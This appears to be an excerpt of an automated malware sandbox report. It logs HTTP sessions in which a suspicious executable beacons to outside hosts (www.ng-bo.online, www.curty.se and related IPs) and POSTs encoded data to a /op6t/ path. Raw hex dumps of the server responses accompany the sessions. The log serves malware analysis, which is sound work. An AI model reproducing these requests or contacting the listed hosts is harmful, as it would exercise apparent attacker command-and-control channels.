                                                                        Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 a9 2a bf 74 fd c0 72 6e 78 cf 84 7f 9b b3 95 e1 18 37 a6 d7 05 e0 a6 31 7f fb 66 65 06 46 67 b6 34 3c df 0c f4 ee bf ff fa fd 60 d4 0d ef 3a c6 ca d4 bb b7 96 79 b7 76 bd 00 d0 bb 4e 60 3a 50 ea ce 9a 07 4b 7d 6e de 5a 33 73 40 7e 70 96 63 05 96 61 0f fc 99 61 9b ba 98 05 e1 b9 d7 6e e0 a7 00 38 ae e5 cc cd 8f 50 2a b0 02 db 7c fb cf ff e3 7f fe 6f ff f3 7f fd e7 7f fd f3 ff fd e7 ff fd 3f ff f7 7f fe 57 07 2e fe c7 a9 73 ed af a7 70 f5 5f ff fc 7f fe f9 7f fd f3 7f e0 d5 9b 33 5a [TRUNCATED]
                                                                        Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrv*trnx71feFg4<`:yvN`:PK}nZ3s@~pcaan8P*|o?W.sp_3Zfge-C}{77A::3g;7V|c173>7|f9+xoxy!HUY"_~iksuvm>5McT+|Xda1[9,\{rdLDAz:*&$?Nu1h+087YSD0f<[Fi53:?3}{9>0}3bV0`-U6`tnQL7)EDpA,lnqsN/[$eP`>Bw,z@pnRTlX;9a pn6ADY;@3%0kL'~pw Wo]Ym*kKq-D2}E%kd6AK\-\`9;!;jU/$8X<K*[IGLU2^>MNH_7&bW1((K3e]<cRDFxZYnWh|Z"r`zc)<8 [TRUNCATED]
                                                                        May 22, 2024 17:33:23.567990065 CEST1289INData Raw: 84 2b 03 04 4f 05 7e 17 e1 31 f8 d8 0c 89 6d ba ce 40 54 29 e8 c6 e4 b2 41 2d 12 99 0c c7 9c 11 9a c0 49 ec c2 d0 f8 fb 97 85 b4 50 16 63 66 4a 4b 70 50 b1 db 97 c8 4a 80 25 f4 11 ff 0f 14 b8 6b 04 13 94 4d 6a 29 0f 05 a1 83 64 9e c9 42 1b 93 d9
                                                                        Data Ascii: +O~1m@T)A-IPcfJKpPJ%kMj)dB3u=Y(!0?9s=xYXRcD]=az2rb(o=k,R~=t`;WswH=F%@sH|[`Ck+gBx>Pv-$h!Wh}
                                                                        May 22, 2024 17:33:23.568656921 CEST1289INData Raw: 7f 50 43 3a c3 8d 67 30 a2 23 fc cf 6d 40 37 ec 8d a4 f9 07 35 9c 33 dc 78 7a a3 39 46 ff bc 06 73 c3 be 88 1b 7f 48 43 39 cb 8a a7 37 92 01 7f 62 20 47 25 c8 71 c4 2b cb c1 b3 bd d1 d9 e8 c5 62 91 7b 0e 66 b4 1b 1f 9d be 1e ce 84 59 69 89 ab b9
                                                                        Data Ascii: PC:g0#m@753xz9FsHC97b G%q+b{fYi}HXCrIx8YQk_27{deG)[<uZ'k er57gIi];'GM9/5C$-D1cK {A!p$:C>io
                                                                        May 22, 2024 17:33:23.568670988 CEST1289INData Raw: 76 21 0a 44 3d a3 f7 b0 93 38 36 c7 21 4d d2 33 f9 0c 3b 29 69 e6 2e 14 28 7a 72 4f a1 94 20 76 27 61 27 3f 98 fc 83 34 1b 9e d7 35 28 b4 e4 d9 bc 82 9d 9c 65 b4 c3 d3 14 3d 97 2f b0 93 96 86 6e 40 91 a6 e7 f3 00 76 2b 6e 46 e3 3f 43 d4 73 d9 fd
                                                                        Data Ascii: v!D=86!M3;)i.(zrO v'a'?45(e=/n@v+nF?Cs{*o`zNku_Eug[k1]9-Sh3RL|llVnSJl}iMzlu@3;c3$=If&}'7Kb7wI_h;9hN)z.~'-M"MgV&}
                                                                        May 22, 2024 17:33:23.568877935 CEST1289INData Raw: f5 60 66 78 e5 2c ff ae aa 5a b0 dc ac ae fd 6a 79 f8 d3 8e 8a 9b 75 69 b5 77 55 d5 36 6b 9c 15 4a eb 7c 5f 55 e7 77 17 bc b7 92 1a a2 d0 fd 5c e7 de da bf cf c6 72 2d 9f bf 73 bf bf 6c a3 95 d8 ab d9 69 2e 3b 8b a5 5c ec f4 9c 25 e4 e7 35 cb b1
                                                                        Data Ascii: `fx,ZjyuiwU6kJ|_Uw\r-sli.;\%5p`$*`Z~f0Fc\my10FqFf_`kYkQx#wN'g?2<&B=@q{ni_S70_m@+\-A>aa>
                                                                        May 22, 2024 17:33:23.568921089 CEST1289INData Raw: 11 fe 21 cd b5 34 f4 e7 34 d7 2a 7b e9 30 e6 da f1 3a a9 02 fc 01 cd 35 96 2e 3a be b9 b6 9a 33 99 6b 99 7e 3c aa b9 c6 d8 a5 07 30 d7 58 7a b7 8d d9 02 3c db c3 5c 3b 36 fd 4f 41 f7 27 63 ae 65 c4 f6 28 e6 1a 5b 77 ed 6f ae b1 74 56 0b 73 ad 9a
                                                                        Data Ascii: !44*{0:5.:3k~<0Xz<\;6OA'ce([wotVsA2J429v,TAoeX$v5iTOaUauRk,]t|{a2xT{K`n%L^;6OA'ce([wotV{AJ29v,TAo`
                                                                        May 22, 2024 17:33:23.569413900 CEST1289INData Raw: 2b 22 cb 9e 06 c7 ea 16 d4 a2 5c d7 79 08 e1 30 ab 8a 09 26 e5 c2 59 a4 2a 00 48 0a 02 1b 0b d4 e4 7b eb da da 5d 06 df d7 b4 b3 10 7d e1 d2 ce 62 d8 f8 9d 85 92 17 17 ed db 1b b4 35 0f 55 d2 c0 d4 1f c0 be 12 6e 95 31 a7 9c 17 d5 54 1d 7f 78 a4
                                                                        Data Ascii: +"\y0&Y*H{]}b5Un1TxpsV5v|n:e3I?>IGRIw+lJzBg<aoEJFh4~TnB4]<~}x)$u0x1wie}u}3ys\_B0B
                                                                        May 22, 2024 17:33:23.569478035 CEST1289INData Raw: 2a f0 6f cc 6b 20 02 28 77 a2 4c 7f 00 5d d8 7c 7e 08 72 2a 0d 71 d8 8e 86 d0 20 18 ce 00 42 19 20 dd 20 bd 02 61 17 b6 65 0c 22 36 e6 47 5a f8 c3 00 a1 19 a1 28 d2 2f 94 55 68 ab 2c a3 e8 49 20 d5 f0 43 a1 1f 44 8c f9 21 2a 05 49 06 3e 08 84 6b
                                                                        Data Ascii: *ok (wL]|~r*q B ae"6GZ(/Uh,I CD!*I>k1^8P9$<Q(n)9'AyMETh~^4@a)*|i3#GCTE~,het# uzx.PF1u@x C#6q
                                                                        May 22, 2024 17:33:23.569868088 CEST1289INData Raw: e3 65 b1 56 48 df 6d be 4a 9e 70 89 10 2e 8e 76 52 3e 0a 3f 73 94 cb e5 6c a1 d4 c9 cc 94 ab 75 94 8f 2a bb 7c 07 e5 65 5d 3e 6a 4c f9 b3 f7 79 8d b0 97 50 be 5b d8 3f 87 3e 7f 66 69 ff 72 fa bc a8 f7 23 f5 7c c3 a8 9b 55 11 4c 51 0c d7 0d 05 b0
                                                                        Data Ascii: eVHmJp.vR>?slu*|e]>jLyP[?>fir#|ULQ>2^^K;4w$`!~tGD_"dkj(!iDNf^&0"26+*T[yfXETI.{5t)Q|mcWNB4mCeie
                                                                        May 22, 2024 17:33:23.569889069 CEST1289INData Raw: 03 e8 67 24 d7 45 b1 96 13 a9 d6 f6 15 ea 5c a7 e7 ed 9d 52 91 d6 58 25 ba 4c a0 9f 4e 9e 43 5b 4e 54 04 85 1c d9 af 10 e8 51 1b 81 1e 1e 5f a0 e5 31 95 68 70 da 40 ba 88 b8 40 73 89 85 33 1a 11 65 0e 77 43 55 1e 6b f2 94 22 df 53 d2 43 25 9e 08
                                                                        Data Ascii: g$E\RX%LNC[NTQ_1hp@@s3ewCUk"SC%zkrsMPO*%!</'RG ` ox>Es[fq#8%z}gE{3)cy)._CX*|J$#C5,a(.i=Z^Z:u0H
                                                                        May 22, 2024 17:33:23.913301945 CEST1289INData Raw: 77 cb 05 38 9c 32 84 22 90 9c 08 e7 81 a4 65 38 04 52 da 96 bc 14 e7 e1 64 c4 38 04 94 93 bf 98 aa 9c 24 17 e9 4a 8b 72 08 2b 27 3b 21 ac 82 30 e7 61 65 a5 39 84 25 97 52 98 17 c3 3c a8 8c 14 46 53 f4 a8 0c 52 51 a4 f3 b0 72 32 1d 42 1b 96 f2 2b
                                                                        Data Ascii: w82"e8Rd8$Jr+';!0ae9%R<FSRQr2B++yH)KvLZ;)#zEA;r'&srjR].KtBF(H2JAP"LP"7C*frV(lFJ`i5 -ZfAdd 8


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        24192.168.11.304982037.140.192.90807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:33:26.063884974 CEST485OUTGET /op6t/?x2=wN2xY&nvddg=QBE+WD5B6Jkt78kVGAOSUjwaMNkkuAvPxxlILtocCDSSbk2FnDvYucSHDfntlLOKDiDLv1Q+MrvgQctCdQiXEWmDWyfYVOljC1RMawJvJ4/x6B/DgtrXZJ0= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.ng-bo.online
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:33:26.427440882 CEST1289INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:33:26 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Data Raw: 66 65 62 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 35 35 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a [TRUNCATED]
                                                                        Data Ascii: feb2<!doctype html><html lang="ru" class="is_adaptive" data-panel-url="https://server55.hosting.reg.ru/manager"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title> &nbsp;</title><style media="all">/*!*************************************************************************************************************************************************************************************************!*\ !*** css ./node_modules/css-loader/index.js??clonedRuleSet-6.use[1]!./node_modules/postcss-loader/src/index.js!./node_modules/less-loader/dist/cjs.js!./bem/blocks.adaptive/b-page/b-page.less ***! \*************************************************************************************************************************************************************************************************/.b-page{display:flex;flex-direction:column;width:100%;min-width:320px;height:100%;padding:57px [TRUNCATED]
                                                                        May 22, 2024 17:33:26.427457094 CEST1289INData Raw: 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76
                                                                        Data Ascii: serif;background:#fff;-webkit-tap-highlight-color:transparent}html:not(.is_adaptive) .b-page{overflow-x:hidden}@media (min-width:1024px){.is_adaptive .b-page{overflow-x:hidden}}.b-page_type_parking{min-height:100vh}.b-page_type_error-page{padd
                                                                        May 22, 2024 17:33:26.427810907 CEST1289INData Raw: 63 6b 7d 2e 62 2d 70 61 67 65 5f 5f 66 6f 6f 74 65 72 2d 64 6f 77 6e 7b 66 6c 65 78 3a 31 20 30 20 61 75 74 6f 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 69 65 20 2e 62 2d 70 61 67 65 5f 5f 66 6f 6f 74 65 72 2d 64 6f 77 6e 7b 6d 69 6e
                                                                        Data Ascii: ck}.b-page__footer-down{flex:1 0 auto;overflow:hidden}.ie .b-page__footer-down{min-height:100%}@media (min-width:1024px){.is_adaptive .b-page__footer-down{overflow:visible}}.b-page__footer-down_overflow_visible{overflow:visible}.b-page__footer
                                                                        May 22, 2024 17:33:26.427876949 CEST1289INData Raw: 78 3b 70 61 64 64 69 6e 67 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 32 66 34 66 39 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 70 61 67 65 5f 5f 61 64 64 69 74 69 6f 6e 2d 77 72 61 70
                                                                        Data Ascii: x;padding:0;background-color:#f2f4f9}html:not(.is_adaptive) .b-page__addition-wrapper{min-width:996px}@media (min-width:1024px){.is_adaptive .b-page__addition-wrapper{min-width:996px}}.b-page__addition-title{float:left;font:700 20px/30px Inter
                                                                        May 22, 2024 17:33:26.428165913 CEST1289INData Raw: 6c 6f 77 5f 76 69 73 69 62 6c 65 2c 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 70 61 67 65 5f 6f 76 65 72 66 6c 6f 77 5f 76 69 73 69 62 6c 65 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 40 6d 65 64 69
                                                                        Data Ascii: low_visible,html:not(.is_adaptive) .b-page_overflow_visible{overflow:visible}@media (min-width:1024px){.is_adaptive .b-page_overflow_visible{overflow:visible}}/*!********************************************************************************
                                                                        May 22, 2024 17:33:26.428188086 CEST1289INData Raw: 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 68 75 67 65 2d 63 6f 6d 70 61 63 74 2e 62
                                                                        Data Ascii: Neue,Helvetica,FreeSans,sans-serif;margin-bottom:60px}.b-text_size_huge-compact.b-text_margin_top,.b-text_size_huge.b-text_margin_top{margin-top:60px}.b-text_size_huge-compact{font:48px/54px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-
                                                                        May 22, 2024 17:33:26.428462982 CEST1289INData Raw: 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 34 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6e 6f 72 6d 61
                                                                        Data Ascii: Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:24px}.b-text_size_normal-compact.b-text_margin_top,.b-text_size_normal.b-text_margin_top{margin-top:24px}.b-text_size_normal-compact{font:15px/18px Inter,Arial,Helvetica Neue,Helvetica
                                                                        May 22, 2024 17:33:26.428478003 CEST1289INData Raw: 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 2c 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 68 75 67 65 5c 40 64 65 73 6b 74 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69
                                                                        Data Ascii: p.b-text_margin_top,html:not(.is_adaptive) .b-text_size_huge\@desktop.b-text_margin_top{margin-top:60px}html:not(.is_adaptive) .b-text_size_huge-compact\@desktop{font:48px/54px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bo
                                                                        May 22, 2024 17:33:26.428976059 CEST1289INData Raw: 6d 3a 33 30 70 78 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6d 65 64 69 75 6d 2d 63 6f 6d 70 61 63 74 5c 40 64 65 73 6b 74 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 74
                                                                        Data Ascii: m:30px}html:not(.is_adaptive) .b-text_size_medium-compact\@desktop.b-text_margin_top,html:not(.is_adaptive) .b-text_size_medium\@desktop.b-text_margin_top{margin-top:30px}html:not(.is_adaptive) .b-text_size_medium-compact\@desktop{font:20px/24
                                                                        May 22, 2024 17:33:26.428991079 CEST1289INData Raw: 67 69 6e 3a 30 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 67 69 61 6e 74 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 37 32 70 78
                                                                        Data Ascii: gin:0}@media (min-width:1024px){.is_adaptive .b-text_size_giant\@desktop{font:72px/84px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}.is_adaptive .b-text_size_giant-compact\@desktop.b-text_margin_top,.is_adaptive
                                                                        May 22, 2024 17:33:26.774002075 CEST1289INData Raw: 61 72 67 65 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 32 34 70 78 2f 33 36 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65
                                                                        Data Ascii: arge\@desktop{font:24px/36px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:36px}.is_adaptive .b-text_size_large-compact\@desktop.b-text_margin_top,.is_adaptive .b-text_size_large\@desktop.b-text_margin_top{margin-top:3


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        25192.168.11.3049821185.76.64.170807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:33:42.460525036 CEST744OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.curty.se
                                                                        Origin: http://www.curty.se
                                                                        Referer: http://www.curty.se/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 37 49 57 37 68 47 50 59 5a 6a 66 62 54 70 30 44 2f 73 45 75 70 6e 74 35 72 56 6a 77 72 76 44 56 41 6a 61 57 63 5a 4b 35 4c 6f 61 44 38 72 34 69 41 50 77 59 79 57 7a 72 2b 72 77 71 30 66 78 44 66 55 62 44 42 6e 44 46 4f 70 2b 72 73 63 4d 2f 59 42 72 65 48 4b 62 35 59 56 59 37 74 49 35 37 46 34 71 6c 4b 49 61 4b 31 4f 6e 49 4d 73 78 44 64 61 57 45 30 58 79 42 6e 36 78 73 2f 65 4b 55 57 38 52 2f 6a 69 6e 38 70 6c 65 4b 48 39 64 53 72 77 53 75 39 77 78 69 2b 54 70 57 4b 44 44 62 6a 38 6d 6e 37 59 77 75 49 2f 5a 74 33 76 75 74 75 49 43 49 57 63 66 6c 79 4d 31 76 79 2b 42 42 61 41 3d 3d
                                                                        Data Ascii: nvddg=7IW7hGPYZjfbTp0D/sEupnt5rVjwrvDVAjaWcZK5LoaD8r4iAPwYyWzr+rwq0fxDfUbDBnDFOp+rscM/YBreHKb5YVY7tI57F4qlKIaK1OnIMsxDdaWE0XyBn6xs/eKUW8R/jin8pleKH9dSrwSu9wxi+TpWKDDbj8mn7YwuI/Zt3vutuICIWcflyM1vy+BBaA==
                                                                        May 22, 2024 17:33:42.812310934 CEST479INHTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:33:42 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        26192.168.11.3049822185.76.64.170807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:33:45.336821079 CEST764OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.curty.se
                                                                        Origin: http://www.curty.se
                                                                        Referer: http://www.curty.se/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 37 49 57 37 68 47 50 59 5a 6a 66 62 53 49 45 44 79 76 63 75 67 6e 74 34 68 31 6a 77 6c 50 44 4a 41 6a 57 57 63 63 6e 6d 4c 36 4f 44 79 76 30 69 44 4b 4d 59 78 57 7a 72 71 62 77 72 77 66 78 32 66 55 47 38 42 6d 2f 46 4f 70 71 72 73 65 55 2f 62 77 72 64 47 61 62 6e 56 31 59 44 67 6f 35 37 46 34 71 6c 4b 4c 6d 73 31 4f 2f 49 4d 2f 70 44 53 66 69 48 71 48 79 41 67 36 78 73 37 65 4b 51 57 38 52 52 6a 6a 36 68 70 6d 32 4b 48 35 5a 53 72 6b 47 74 71 67 78 73 68 44 6f 56 50 69 75 30 37 2b 61 4c 71 37 55 65 53 61 4e 53 32 34 66 33 7a 4c 32 4b 46 38 6a 49 75 4e 59 48 77 38 41 61 48 4f 44 57 6d 61 6e 6c 62 56 4c 4a 4c 72 4e 44 43 46 6e 59 47 77 51 3d
                                                                        Data Ascii: nvddg=7IW7hGPYZjfbSIEDyvcugnt4h1jwlPDJAjWWccnmL6ODyv0iDKMYxWzrqbwrwfx2fUG8Bm/FOpqrseU/bwrdGabnV1YDgo57F4qlKLms1O/IM/pDSfiHqHyAg6xs7eKQW8RRjj6hpm2KH5ZSrkGtqgxshDoVPiu07+aLq7UeSaNS24f3zL2KF8jIuNYHw8AaHODWmanlbVLJLrNDCFnYGwQ=
                                                                        May 22, 2024 17:33:45.683753014 CEST479INHTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:33:45 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        27192.168.11.3049823185.76.64.170807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:33:48.216077089 CEST1681OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
